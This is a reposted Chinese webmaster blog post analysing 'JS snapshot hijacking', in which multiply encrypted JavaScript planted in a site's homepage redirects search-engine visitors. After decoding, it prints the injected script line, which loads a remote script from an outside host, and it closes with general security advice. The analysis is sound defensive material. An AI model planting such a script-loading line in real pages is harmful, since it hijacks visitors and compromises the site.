本站免费资源,希望大家帮忙花点点时间点击广告 免费淘宝优惠券
免费资源网(www.aaaweb.cn)网络资源分享平台

随便撸分享平台

转载无忧博客-网站JS快照被劫持恢复诊断教程

时间:2017-09-18 21:17 出处:网络 作者:@免费资源分享网

站长们经常遇到js快照劫持的问题,对网站的优化带来及大的影响。对于大多数新手站长来说js快照劫持,束手无策。今天无忧老师为大家进行一轮深度的解析。

一,js快照劫持示例

js快照劫持演示图,记录了是网站跳转的。

一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。

JS快照劫持,百度搜索演示图

JS快照劫持,搜狐搜索演示图

 

二,分析js快照劫持代码

经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。

此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。

三,加密JS层层分析

接下来进行JS反向解析分析。可以使用站长工具在线分析:http://tool.chinaz.com/js.aspx

站长工具JS混淆加密压缩 截图

解析后,可以看到真面目,这段代码。

< script type = “text/javascript” >

document.writeln(“<script src=http://www.5121188.com/main2.js></script>”); < /script>

打开这个main2.js可以看到一段落代码。

JS恶意代码二次加密

攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。

然后再进行解密。

被加密的JS恶意代码解析图

这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。

 

四,网站安全建议

网站安全一直是一个让站长运营者头痛的问题,没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,最大程度的杜绝网站被黑被劫持的风险。希望各位站长清楚并且牢记在心。

转载请注明来源:转载无忧博客-网站JS快照被劫持恢复诊断教程

本文永久链接地址:http://www.aaaweb.cn/jianzhanyunying/135.html

郑重声明:
本站所有内容均由互联网收集整理、网友上传,并且以计算机技术研究交流为目的,仅供大家参考、学习,不存在任何商业目的与商业用途。
若您需要商业运营或用于其他商业活动,请您购买正版授权并合法使用。 我们不承担任何技术及版权问题,且不对任何资源负法律责任。
如无法链接失效或侵犯版权,请给我们来信:1018450487@qq.com

栏目标签
最新资源
热门资源